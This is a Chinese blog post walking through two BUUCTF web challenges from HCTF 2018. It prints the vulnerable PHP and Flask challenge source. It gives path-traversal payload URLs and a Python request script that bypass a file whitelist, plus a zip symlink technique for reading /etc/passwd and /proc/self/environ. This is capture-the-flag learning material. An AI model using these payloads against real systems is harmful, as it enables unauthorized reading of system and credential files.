<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="0x00:[HCTF 2018]0x00:WarmUp打开网页出现这个图像：   查看源代码发现提示：   输入提示跟踪过去，发现源码： 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849 &lt;?php    highlight_file(__FILE__);">
<meta property="og:type" content="article">
<meta property="og:title" content="buuctf闯关记录-web篇">
<meta property="og:url" content="http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/index.html">
<meta property="og:site_name" content="bai191">
<meta property="og:description" content="0x00:[HCTF 2018]0x00:WarmUp打开网页出现这个图像：   查看源代码发现提示：   输入提示跟踪过去，发现源码： 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849 &lt;?php    highlight_file(__FILE__);">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/1.png">
<meta property="og:image" content="http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/2.png">
<meta property="og:image" content="http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/h1.png">
<meta property="og:image" content="http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/h2.png">
<meta property="article:published_time" content="2020-05-19T13:04:53.000Z">
<meta property="article:modified_time" content="2020-05-19T13:04:53.000Z">
<meta property="article:author" content="bai191">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="buuctf">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/1.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>buuctf闯关记录-web篇</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 4.2.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">主页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">文章</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/tools/">工具</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2020/05/20/docker%E4%BD%BF%E7%94%A8%E8%AE%B0%E5%BD%95/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2020/05/19/%E5%BC%80%E9%80%9AhexoBlog%E7%9A%84%E7%88%AC%E5%9D%91/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/" target="_blank" rel="noopener"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/&text=buuctf闯关记录-web篇" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/&title=buuctf闯关记录-web篇" target="_blank" rel="noopener"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/&is_video=false&description=buuctf闯关记录-web篇" target="_blank" rel="noopener"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=buuctf闯关记录-web篇&body=Check out this article: http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/&title=buuctf闯关记录-web篇" target="_blank" rel="noopener"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/&title=buuctf闯关记录-web篇" target="_blank" rel="noopener"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/&title=buuctf闯关记录-web篇" target="_blank" rel="noopener"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/&title=buuctf闯关记录-web篇" target="_blank" rel="noopener"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/&name=buuctf闯关记录-web篇&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/&t=buuctf闯关记录-web篇" target="_blank" rel="noopener"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x00-HCTF-2018"><span class="toc-number">1.</span> <span class="toc-text">0x00:[HCTF 2018]</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-WarmUp"><span class="toc-number">1.1.</span> <span class="toc-text">0x00:WarmUp</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-Hideandseek"><span class="toc-number">1.2.</span> <span class="toc-text">0x01:Hideandseek</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        buuctf闯关记录-web篇
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">bai191</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-05-19T13:04:53.000Z" itemprop="datePublished">2020-05-19</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/ctf/">ctf</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/buuctf/" rel="tag">buuctf</a>, <a class="tag-link" href="/tags/ctf/" rel="tag">ctf</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 id="0x00-HCTF-2018"><a href="#0x00-HCTF-2018" class="headerlink" title="0x00:[HCTF 2018]"></a>0x00:[HCTF 2018]</h1><h2 id="0x00-WarmUp"><a href="#0x00-WarmUp" class="headerlink" title="0x00:WarmUp"></a>0x00:WarmUp</h2><p>打开网页出现这个图像：</p>
<img src="/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/1.png" class="" title="图片">

<p>查看源代码发现提示：</p>
<img src="/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/2.png" class="" title="this is image">

<p>输入提示跟踪过去，发现源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">emmm</span></span></span><br><span class="line"><span class="class">    </span>&#123;</span><br><span class="line">        <span class="keyword">public</span> <span class="keyword">static</span> <span class="function"><span class="keyword">function</span> <span class="title">checkFile</span><span class="params">(&amp;$page)</span></span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            $whitelist = [<span class="string">"source"</span>=&gt;<span class="string">"source.php"</span>,<span class="string">"hint"</span>=&gt;<span class="string">"hint.php"</span>];</span><br><span class="line">            <span class="keyword">if</span> (! <span class="keyword">isset</span>($page) || !is_string($page)) &#123;</span><br><span class="line">                <span class="keyword">echo</span> <span class="string">"you can't see it"</span>;</span><br><span class="line">                <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> (in_array($page, $whitelist)) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            $_page = mb_substr(</span><br><span class="line">                $page,</span><br><span class="line">                <span class="number">0</span>,</span><br><span class="line">                mb_strpos($page . <span class="string">'?'</span>, <span class="string">'?'</span>)</span><br><span class="line">            );</span><br><span class="line">            <span class="keyword">if</span> (in_array($_page, $whitelist)) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            $_page = urldecode($page);</span><br><span class="line">            $_page = mb_substr(</span><br><span class="line">                $_page,</span><br><span class="line">                <span class="number">0</span>,</span><br><span class="line">                mb_strpos($_page . <span class="string">'?'</span>, <span class="string">'?'</span>)</span><br><span class="line">            );</span><br><span class="line">            <span class="keyword">if</span> (in_array($_page, $whitelist)) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">"you can't see it"</span>;</span><br><span class="line">            <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (! <span class="keyword">empty</span>($_REQUEST[<span class="string">'file'</span>])</span><br><span class="line">        &amp;&amp; is_string($_REQUEST[<span class="string">'file'</span>])</span><br><span class="line">        &amp;&amp; emmm::checkFile($_REQUEST[<span class="string">'file'</span>])</span><br><span class="line">    ) &#123;</span><br><span class="line">        <span class="keyword">include</span> $_REQUEST[<span class="string">'file'</span>];</span><br><span class="line">        <span class="keyword">exit</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"&lt;br&gt;&lt;img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" /&gt;"</span>;</span><br><span class="line">    &#125;  </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>这个有四个if判断：</p>
<ol>
<li><p>第一个判断是否为空或者是否为为字符，满足其中一个条件就行</p>
</li>
<li><p>第二个判断判断$page变量是不是在$whitelist变量中，在就返回true</p>
</li>
<li><p>第三个判断$page中?前面的字符是不是在$whitelist,在就返回true</p>
</li>
<li><p>第四个判断先把$page进行url解码，解码后判断$page中?前面的字符是不是在$whitelist，是就返回true</p>
<p>而且include函数会以./or../过滤掉来包含文件</p>
<p>所以第三个判断或者第四个判断可以绕过</p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;1310c151-8595-46ca-80b4-3bbf85b8812e.node3.buuoj.cn&#x2F;?file&#x3D;source.php?..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;ffffllllaaaagggg		&#x2F;&#x2F;通过第三个判断返回</span><br><span class="line">http:&#x2F;&#x2F;1310c151-8595-46ca-80b4-3bbf85b8812e.node3.buuoj.cn&#x2F;?file&#x3D;source.php%253F..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;ffffllllaaaagggg		&#x2F;&#x2F;两次url加密绕过通过第四个判断返回</span><br></pre></td></tr></table></figure>

<p>或者通过python脚本获取：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://1310c151-8595-46ca-80b4-3bbf85b8812e.node3.buuoj.cn/"</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#payload = "?file=source.php%253F../../../../../ffffllllaaaagggg"</span></span><br><span class="line">payload = <span class="string">"?file=source.php?../../../../../ffffllllaaaagggg"</span></span><br><span class="line"></span><br><span class="line">r = requests.get(url+payload)</span><br><span class="line">print(r.text)</span><br></pre></td></tr></table></figure>



</li>
</ol>
<h2 id="0x01-Hideandseek"><a href="#0x01-Hideandseek" class="headerlink" title="0x01:Hideandseek"></a>0x01:Hideandseek</h2><p>打开网页看到下面的界面</p>
<img src="/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/h1.png" class="" title="图片">

<p>我们先登录看下，发现随便输入个账户密码都能登录，所以说明没有数据库等操作。所以这个登录的信息应该是存储在cookie中，用脚本解密成功，是flask,而且还有admin用户，这个题应该是登录admin,才能获取flag吧，可以更改cookie来获取，但是要知道<strong>SECRET_KEY</strong>才能伪造。只能先登录吧。登录过后要我们上传一个zip文件：</p>
<img src="/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/h2.png" class="" title="图片">

<p>上传一个带有test字符的txt文件的压缩包，发现回显的是test，说明他把压缩包中的文本直接显示出来，这里就有一个文件读取漏洞。但是不知道如何利用。去网上查了下才知道可以通过软连接来读取文件。创建一个zip文件测试下</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ ln -s /etc/passwd passwd</span><br><span class="line">$ zip -y passwd.zip passwd</span><br></pre></td></tr></table></figure>

<p>创建后，上传发现回显成功，说明可以直接利用。但是此时又不知道flag文件的位置，该如何知道呢。看了资料才知道可以用/proc/self/environ来查看当前环境的变量</p>
<p>/<a href="https://www.cnblogs.com/DswCnblog/p/5780389.html" target="_blank" rel="noopener">proc</a></p>
<p>生成软链接的压缩包，上传，出现下面的环境变量：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">HOSTNAME&#x3D;14ca5f33a455</span><br><span class="line">SHLVL&#x3D;1</span><br><span class="line">PYTHON_PIP_VERSION&#x3D;19.1.1</span><br><span class="line">HOME&#x3D;&#x2F;root</span><br><span class="line">GPG_KEY&#x3D;0D96DF4D4110E5C43FBFB17F2D347EA6AA65421D</span><br><span class="line">UWSGI_INI&#x3D;&#x2F;app&#x2F;uwsgi.ini</span><br><span class="line">WERKZEUG_SERVER_FD&#x3D;3</span><br><span class="line">NGINX_MAX_UPLOAD&#x3D;0</span><br><span class="line">UWSGI_PROCESSES&#x3D;16</span><br><span class="line">STATIC_URL&#x3D;&#x2F;</span><br><span class="line">static_&#x3D;&#x2F;usr&#x2F;local&#x2F;bin&#x2F;python</span><br><span class="line">UWSGI_CHEAPER&#x3D;2</span><br><span class="line">WERKZEUG_RUN_MAIN&#x3D;true</span><br><span class="line">NGINX_VERSION&#x3D;1.15.8-1~</span><br><span class="line">stretchPATH&#x3D;&#x2F;usr&#x2F;local&#x2F;bin:&#x2F;usr&#x2F;local&#x2F;sbin:&#x2F;usr&#x2F;local&#x2F;bin:&#x2F;usr&#x2F;sbin:&#x2F;usr&#x2F;bin:&#x2F;sbin:&#x2F;bin</span><br><span class="line">NJS_VERSION&#x3D;1.15.8.0.2.7-1~</span><br><span class="line">stretchLANG&#x3D;C.UTF-8</span><br><span class="line">PYTHON_VERSION&#x3D;3.6.8</span><br><span class="line">NGINX_WORKER_PROCESSES&#x3D;1</span><br><span class="line">LISTEN_PORT&#x3D;80</span><br><span class="line">STATIC_INDEX&#x3D;0</span><br><span class="line">PWD&#x3D;&#x2F;app</span><br><span class="line">PYTHONPATH&#x3D;&#x2F;app</span><br><span class="line">STATIC_PATH&#x3D;&#x2F;app&#x2F;static</span><br><span class="line">FLAG&#x3D;not_flag</span><br></pre></td></tr></table></figure>

<p>从上面看到了一个ini结尾的配置文件，上网查了查，是uWSGIweb应用服务器。有读取了这个文件:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">[uwsgi] </span><br><span class="line">module &#x3D; main </span><br><span class="line">callable&#x3D;app </span><br><span class="line">logto &#x3D; &#x2F;tmp&#x2F;hard_t0_guess_n9p2i5a6d1s_uwsgi.log</span><br></pre></td></tr></table></figure>

<p>源码应该在<strong>/app/mian.py</strong></p>
<p>但是读取出来的文件是这样，一直不对，还是buuctf平台的问题，就去网上找了个：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask,session,render_template,redirect, url_for, escape, request,Response</span><br><span class="line"><span class="keyword">import</span> uuid</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"><span class="keyword">import</span> flag</span><br><span class="line"><span class="keyword">from</span> werkzeug.utils <span class="keyword">import</span> secure_filename</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line">random.seed(uuid.getnode())</span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.config[<span class="string">'SECRET_KEY'</span>] = str(random.random()*<span class="number">100</span>)</span><br><span class="line">app.config[<span class="string">'UPLOAD_FOLDER'</span>] = <span class="string">'./uploads'</span></span><br><span class="line">app.config[<span class="string">'MAX_CONTENT_LENGTH'</span>] = <span class="number">100</span> * <span class="number">1024</span></span><br><span class="line">ALLOWED_EXTENSIONS = set([<span class="string">'zip'</span>])</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">allowed_file</span><span class="params">(filename)</span>:</span></span><br><span class="line">    <span class="keyword">return</span> <span class="string">'.'</span> <span class="keyword">in</span> filename <span class="keyword">and</span> \</span><br><span class="line">           filename.rsplit(<span class="string">'.'</span>, <span class="number">1</span>)[<span class="number">1</span>].lower() <span class="keyword">in</span> ALLOWED_EXTENSIONS</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/', methods=['GET'])</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">index</span><span class="params">()</span>:</span></span><br><span class="line">    error = request.args.get(<span class="string">'error'</span>, <span class="string">''</span>)</span><br><span class="line">    <span class="keyword">if</span>(error == <span class="string">'1'</span>):</span><br><span class="line">        session.pop(<span class="string">'username'</span>, <span class="literal">None</span>)</span><br><span class="line">        <span class="keyword">return</span> render_template(<span class="string">'index.html'</span>, forbidden=<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> <span class="string">'username'</span> <span class="keyword">in</span> session:</span><br><span class="line">        <span class="keyword">return</span> render_template(<span class="string">'index.html'</span>, user=session[<span class="string">'username'</span>], flag=flag.flag)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> render_template(<span class="string">'index.html'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/login', methods=['POST'])</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">login</span><span class="params">()</span>:</span></span><br><span class="line">    username=request.form[<span class="string">'username'</span>]</span><br><span class="line">    password=request.form[<span class="string">'password'</span>]</span><br><span class="line">    <span class="keyword">if</span> request.method == <span class="string">'POST'</span> <span class="keyword">and</span> username != <span class="string">''</span> <span class="keyword">and</span> password != <span class="string">''</span>:</span><br><span class="line">        <span class="keyword">if</span>(username == <span class="string">'admin'</span>):</span><br><span class="line">            <span class="keyword">return</span> redirect(url_for(<span class="string">'index'</span>,error=<span class="number">1</span>))</span><br><span class="line">        session[<span class="string">'username'</span>] = username</span><br><span class="line">    <span class="keyword">return</span> redirect(url_for(<span class="string">'index'</span>))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/logout', methods=['GET'])</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">logout</span><span class="params">()</span>:</span></span><br><span class="line">    session.pop(<span class="string">'username'</span>, <span class="literal">None</span>)</span><br><span class="line">    <span class="keyword">return</span> redirect(url_for(<span class="string">'index'</span>))</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/upload', methods=['POST'])</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">upload_file</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="keyword">if</span> <span class="string">'the_file'</span> <span class="keyword">not</span> <span class="keyword">in</span> request.files:</span><br><span class="line">        <span class="keyword">return</span> redirect(url_for(<span class="string">'index'</span>))</span><br><span class="line">    file = request.files[<span class="string">'the_file'</span>]</span><br><span class="line">    <span class="keyword">if</span> file.filename == <span class="string">''</span>:</span><br><span class="line">        <span class="keyword">return</span> redirect(url_for(<span class="string">'index'</span>))</span><br><span class="line">    <span class="keyword">if</span> file <span class="keyword">and</span> allowed_file(file.filename):</span><br><span class="line">        filename = secure_filename(file.filename)</span><br><span class="line">        file_save_path = os.path.join(app.config[<span class="string">'UPLOAD_FOLDER'</span>], filename)</span><br><span class="line">        <span class="keyword">if</span>(os.path.exists(file_save_path)):</span><br><span class="line">            <span class="keyword">return</span> <span class="string">'This file already exists'</span></span><br><span class="line">        file.save(file_save_path)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">'This file is not a zipfile'</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        extract_path = file_save_path + <span class="string">'_'</span></span><br><span class="line">        os.system(<span class="string">'unzip -n '</span> + file_save_path + <span class="string">' -d '</span>+ extract_path)</span><br><span class="line">        read_obj = os.popen(<span class="string">'cat '</span> + extract_path + <span class="string">'/*'</span>)</span><br><span class="line">        file = read_obj.read()</span><br><span class="line">        read_obj.close()</span><br><span class="line">        os.system(<span class="string">'rm -rf '</span> + extract_path)</span><br><span class="line">    <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">        file = <span class="literal">None</span></span><br><span class="line"></span><br><span class="line">    os.remove(file_save_path)</span><br><span class="line">    <span class="keyword">if</span>(file != <span class="literal">None</span>):</span><br><span class="line">        <span class="keyword">if</span>(file.find(base64.b64decode(<span class="string">'aGN0Zg=='</span>).decode(<span class="string">'utf-8'</span>)) != <span class="number">-1</span>):</span><br><span class="line">            <span class="keyword">return</span> redirect(url_for(<span class="string">'index'</span>, error=<span class="number">1</span>))</span><br><span class="line">    <span class="keyword">return</span> Response(file)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    <span class="comment">#app.run(debug=True)</span></span><br><span class="line">    app.run(host=<span class="string">'0.0.0.0'</span>, debug=<span class="literal">True</span>, port=<span class="number">10008</span>)</span><br></pre></td></tr></table></figure>

